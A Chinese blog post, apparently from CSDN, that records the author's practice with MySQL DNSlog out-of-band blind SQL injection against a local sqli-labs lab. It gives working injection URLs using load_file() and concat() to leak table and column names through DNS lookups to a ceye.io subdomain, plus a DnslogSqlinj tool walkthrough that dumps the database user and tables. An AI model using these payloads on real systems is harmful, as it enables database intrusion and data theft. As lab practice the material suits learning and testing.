concat拼接的坑 mysql_DNSlog注入踩坑记录:

最新推荐文章于 2023-03-22 10:46:49 发布
最新推荐文章于 2023-03-22 10:46:49 发布
阅读量270 收藏
点赞数
文章标签: concat拼接的坑 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39963465/article/details/112161608
版权

我遇到了两个巨坑,加上http://ceye.io/,经常无法访问,记录一下心酸的踩坑历史。

直接将两个巨坑放到最前面,提醒后人!!

1. sql盲注,后端数据库用的mysql数据库,说一下用dnslog回显只能用于windows系统,原理就是''代表Microsoft Windows通用命名约定(UNC)的文件和目录路径格式利用任何以下扩展存储程序引发DNS地址解析。双斜杠表示网络资源路径多加两个就是转义了反斜杠。

2. 通过DNSlog盲注需要用的load_file()函数,所以一般得是root权限。show variables like '%secure%';查看load_file()可以读取的磁盘。

1、当secure_file_priv为空,就可以读取磁盘的目录。
2、当secure_file_priv为G:,就可以读取G盘的文件。
3、当secure_file_priv为null,load_file就不能加载文件。
我当初的:直接在centos上进行测试,之后在win10上测试的时候没有使用这个函数进行查看。
直接被自己蠢哭.... ...

通过设置my.ini来配置。secure_file_priv=""就是可以load_flie任意磁盘的文件。先简单介绍一下原理:

关于OOB
out-of-band带外数据(OOB)与inband相反,它是一种通过其他传输方式来窃取数据的技术(例如利用DNS解析协议和电子邮件)。OOB技术通常需要易受攻击的实体生成出站TCP/UDP/ICMP请求,然后允许攻击者泄露数据。OOB攻击的成功基于出口防火墙规则,即是否允许来自易受攻击的系统和外围防火墙的出站请求。而从域名服务器(DNS)中提取数据,则被认为是最隐蔽有效的方法。

DNSlog在Web漏洞利用简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过这种方式把想获得的数据外带出来。

这里使用的DNS的原因是:DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息 简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息。

上张图:

7f2b1bedb611c13a1e039913a3508764.png

所以,首先需要一个域名http://abc.com,之后访问xxx.abccom,dns服务会将此解析放入log记录中,之后就可以通过log记录获取之前的查询信息。

这里推荐生成域名的平台http://www.ceye.io,我使用的时候经常连接被重置,不知道为啥

注册完成后

05dfec22b8fed8111d46d2e3c7ef8a3d.png

实现条件(如上)

1、SQL盲注、无回显的命令执行、无回显的SSRF 2、只能用于windows系统 3、需要用到mysql中的load_file()函数,在Mysql中,load_file()函数读取一个文件并将其内容作为字符串返回。(不绝对,仅仅只是列举了mysql数据库的函数)

再介绍一下UNC

UNC路径
什么是UNC路径?
UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器. UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。
UNC路径就是类似softer这样的形式的网络路径。它符合 servernamesharename 格式,其中 servername 是服务器名,sharename 是共享资源的名称。
目录或文件的 UNC 名称可以包括共享名称下的目录路径,格式为:servernamesharenamedirectoryfilename。
例如把自己电脑的文件共享,你会获得如下路径,这就是UNC路径
//iZ53sl3r1890u7Z/Users/Administrator/Desktop/111.txt

配置完成后开始注入

这样配置完成后,在数据库中进行测试,dnslog被记录下来的。

使用load_file()这个函数支持对外的读取,所以拼接payload。下面就可以进行愉快的sql注入了

64bcc8b64a085ad52673f284254d2d60.png

dnslog被记录下来的。
使用load_file()这个函数支持对外的读取,所以拼接payload。下面就可以进行愉快的sql注入了

7e15cc539233d92bc404360c5724b316.png

成功爆出数据库名,下面继续爆数据表名

http://192.168.64.152/sqli-labs/Less-9/?id=-1' and if((select load_file(concat('',(select table_name from information_schema.tables where table_schema=database() limit 2,1),'.XXXXX.ceye.ioabc'))),1,0)--+

继续爆列名

http://192.168.64.152/sqli-labs/Less-9/?id=-1' and if((select load_file(concat('',(select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1),'.XXXXX.ceye.ioabc'))),1,0)--+

最后直接爆数据,大功告成!

DNS注入工具:DnslogSqlinj

可以直接在github上下,https://github.com/ADOOO/DnslogSqlinj,需要py2的环境来运行

下载完成后直接解压

will@kali:~$ unzip DnslogSqlinj-master.zip 
will@kali:~$ cd DnslogSqlinj-master/
will@kali:~/DnslogSqlinj-master$ ls
checkSql.py  checkSql.pyc  config.py  config.pyc  dnslogSql.py  README.md
will@kali:~/DnslogSqlinj-master$ vim config.py
    注意,这里要修改这两个为你自己的
    # DNSlog 设置
    APItoken = 'xxxxx'
    DNSurl = 'xxx'
    修改完成后保存
will@kali:~/DnslogSqlinj-master$ sudo python dnslogSql.py 
_______________________________________________________________
         _____            _                   _____       _ 
        |  __           | |                 |_   _|     (_)
        | |  | |_ __  ___| |     ___   __ _    | |  _ __  _ 
        | |  | | '_ / __| |    / _  / _` |   | | | '_ | |
        | |__| | | | __  |___| (_) | (_| |  _| |_| | | | |
        |_____/|_| |_|___/_________/ __, | |_____|_| |_| |
                                       __/ |            _/ |
                                      |___/            |__/ 
​
        DnsLog SqlInj Scanner by ADO
        Version 1.0
        https://github.com/ADOOO/DnslogSqlinj
_______________________________________________________________
​
Usage: dnslogSql.py [options] -u http://10.1.1.9/sqli-labs/Less-9/?id=1' and ({})--+
​
Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -u URL, --url=URL     target include injection
  -c, --check           task name
  -n TASKNAME, --name=TASKNAME
                        task name
  -t THREAD_COUNT, --thread=THREAD_COUNT
                        thread_count
  -i INF, --inf=INF     Testing target and Try to get information
  --dbs                 get database
  -D DB                 database name
  --tables              get table
  -T TABLE              table name
  --columns             get column
  -C COLUMN             column name
  --dump                get data
根据提示,配置参数,如下
will@kali:~/DnslogSqlinj-master$ sudo python dnslogSql.py -u "http://192.168.64.152/sqli-labs/Less-9/?id=1' and ({})--+"
​
[!]Testing Target and Try to get current information!
​
[*]Current user:        root@localhost
[*]Current data:        security
得到数据库名和用户名(在平台中也能看到记录,但是是数字和一些英文,木有看懂)

继续获取对应数据库下面的数据表

will@kali:~/DnslogSqlinj-master$ sudo python dnslogSql.py -u "http://192.168.64.152/sqli-labs/Less-9/?id=1' and ({})--+" -D "security" --tables
​
[*]Database:security
[*]Get data count: 4
[*]Data 2:      referers
[*]Data 4:      users
[*]Data 3:      uagents
[*]Data 1:      emails

然后继续爆字段,爆数据

71f163319c358a292d0fd3ce6d2164ba.png

PS:写的逻辑有些混乱,web萌新,多多包涵。
参考:还有其他很多

DNS log注入​www.jianshu.com
20570570831ae6a44cf47d2675626824.png
weixin_39963465
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dnslog注入_dnslog盲注
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 1739
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数dnslog
DnslogSqlinj
05-10
DnslogSqlinj 具有ceye.io的DnsLog SQL注入工具 用法 Usage: dnslogSql.py [options] -u http://10.1.1.9/sqli-labs/Less-9/?id=1' and ({})--+ Options: --version show program's version number and exit -h, --help show this help message and exit -n TASKNAME, --name=TASKNAME task name -t THREAD_COUNT, --thread=THREAD_COUNT thread_count -
C语言 预处理命令
tuyerv的博客
12-15 630
预处理过程扫描源代码,对其进行初步的转换,产生新的源代码提供给编译器。可见预处理过程先于编译器对源代码进行处理。在C语言中,并没有任何内在的机制来完成如下一些功能:在编译时包含其他源文件、定义宏、根据条件决定编译时是否包含某些代码。要完成这些工作,就需要使用预处理程序。尽管在目前绝大多数编译器都包含了预处理程序,但通常认为它们是独立于编译器的。预处理过程读入源代码,检查包含预处理指令...
c语言中双反斜杠的作用,有关c语言中的反斜杠 '\'
weixin_33942142的博客
05-16 4071
2020-02-02关键字:反斜杠趣谈稍微懂点编程的同学,甭管是哪种编程语言,都知道甚至是在代码中用过反斜杠。反斜杠这东西的最为人所知的作用就是作为“转义字符”以及“连接符”来使用。例如,常见的正则表达式用途:grep -nr "init*\.rc"以及在 c语言 领域常见的连接代码用途:#define LOG(a,b) do{\printf("[LOG]%d--%d", a, b); \}whi...
Oracle(一)
wzj_110的博客
06-04 4223
一、MySQL创建用户与授权
unc 通用命名规则
黑鸟酱
02-23 1109
     在网络中,通用命名规则(UNC,Universal Naming Convention)一种辨别一个位于电脑中的共享文件,而不需要指定(和不知道)它的存储设备的方式。在Windows操作系统、Novell NetWare ,以及其他一些可能的操作系统,UNC 都可以用来替代本地命名系统(例如Windows中的DOS命名系统)。       在Windows操作系统中,UNC...
mysql-dnslog注入
Adminxe的博客
05-05 1826
@Adminxe http://ceye.io/ //dnslog注入平台 dnslog原理简介: 简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。 对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设...
mysql group concat到每一行数据_MySQL_函数GROUP_CONCAT_合并多行数据到一行
weixin_28981373的博客
02-01 110
GROUP_CONCAT(expr)该函数返回带有来自一个组的连接的非NULL值的字符串结果。其完整的语法如下所示:GROUP_CONCAT([DISTINCT] expr [,expr ...][ORDER BY {unsigned_integer | col_name | expr}[ASC | DESC] [,col_name ...]][SEPARATOR str_val])在MySQL中...
MySql GROUP_CONCAT记录
.
12-14 1091
今天遇到一个问题,在使用GROUP_CONCAT 拼接订单号时候,并且去重,出现下面这种情况,实际上是一个数据,但是后台返回给前台数据一会儿是2条重复数据,一会儿是1条不重复数据 搞得很郁闷,后来查来查去是GROUP_CONCAT 本身拼接字段是没有顺序的,是无规则的,解决办法也很简单就是让排序呗 group_concat内部排序一下,就不会顺序错乱了 使用语法如下 group_concat(field order by field) GROUP_CONCAT( oi.order_no ORDER BY
mysql中GROUP_CONCAT拼接换行
qq_41309961的博客
03-22 2985
mysql中GROUP_CONCAT拼接换行
MySQL拼接字符串函数GROUP_CONCAT详解
09-08
本文给大家详细讲解了MySQL拼接字符串函数GROUP_CONCAT的几种使用方法以及详细示例,有需要的小伙伴可以参考下
MySQL GROUP_CONCAT限制解决方案
12-14
 GROUP_CONCAT函数可以拼接某个字段值成字符串,默认的分隔符是 逗号,即”,” ,  如果需要自定义分隔符可以使用 SEPARATOR  如: SELECT GROUP_CONCAT(name SEPARATOR '_') FROM user 限制:  GROUP_CONCAT...
如何修改Mysql中group_concat的长度限制
09-09
mysql中,有个函数叫“group_concat”,平常使用可能发现不了问题,在处理大数据的时候,会发现内容被截取了。怎么解决这一问题呢,下面脚本之家小编给大家带来了Mysql中group_concat的长度限制问题,感兴趣的朋友...
concat::cat_face:连接文件
05-16
康卡特 串联多个文件用法Usage: concat [options]concatenate multiple filesOptions: -h, --help output usage information -V, --version output the version number -o, --output < file> output file 例子: ...
基于springboot+vue+MySQL实现的在线考试系统+源代码+文档
06-01
web期末作业设计网页 基于springboot+vue+MySQL实现的在线考试系统+源代码+文档
318_面向物联网机器视觉的目标跟踪方法设计与实现的详细信息-源码.zip
06-02
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。
FPGA Verilog 计算信号频率,基础时钟100Mhz,通过锁相环ip核生成200Mhz检测时钟,误差在10ns
06-02
结合等精度测量原理和原理示意图可得:被测时钟信号的时钟频率fx的相对误差与被测时钟信号无关;增大“软件闸门”的有效范围或者提高“标准时钟信号”的时钟频率fs,可以减小误差,提高测量精度。 实际闸门下被测时钟信号周期数为X,设被测信号时钟周期为Tfx,它的时钟频率fx = 1/Tfx,由此可得等式:X * Tfx = X / fx = Tx(实际闸门)。 其次,将两等式结合得到只包含各自时钟周期计数和时钟频率的等式:X / fx = Y / fs = Tx(实际闸门),等式变换,得到被测时钟信号时钟频率计算公式:fx = X * fs / Y。 最后,将已知量标准时钟信号时钟频率fs和测量量X、Y带入计算公式,得到被测时钟信号时钟频率fx。
校园二手商品交易系统三.wmv
最新发布
06-02
校园二手商品交易系统三.wmv
基于Spring Security的OAuth2.1和OIDC1.0认证服务器设计源码
06-02
本源码提供了一个基于Spring Security框架的OAuth2.1和OIDC1.0认证服务器实现。项目包含102个文件,主要使用Java(51个文件)、JSP(12个文件)、XML(10个文件)、HTML(9个文件)等编程语言和标记语言开发。此外,还包括了properties、txt、ddl、css、ico等格式的文件。这个认证服务器项目旨在实现现代的身份验证和授权机制,支持OAuth 2.1和OpenID Connect 1.0协议,适用于需要在应用程序中实现安全认证的开发者。
pd.concat((train_data.iloc[:, 1:-1], test_data.iloc[:, 1:]))
04-06
The `pd.concat()` function is used to concatenate these two dataframes along axis 0 (i.e., vertically) into a single dataframe. The resulting dataframe will contain all the rows from `train_data` and ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值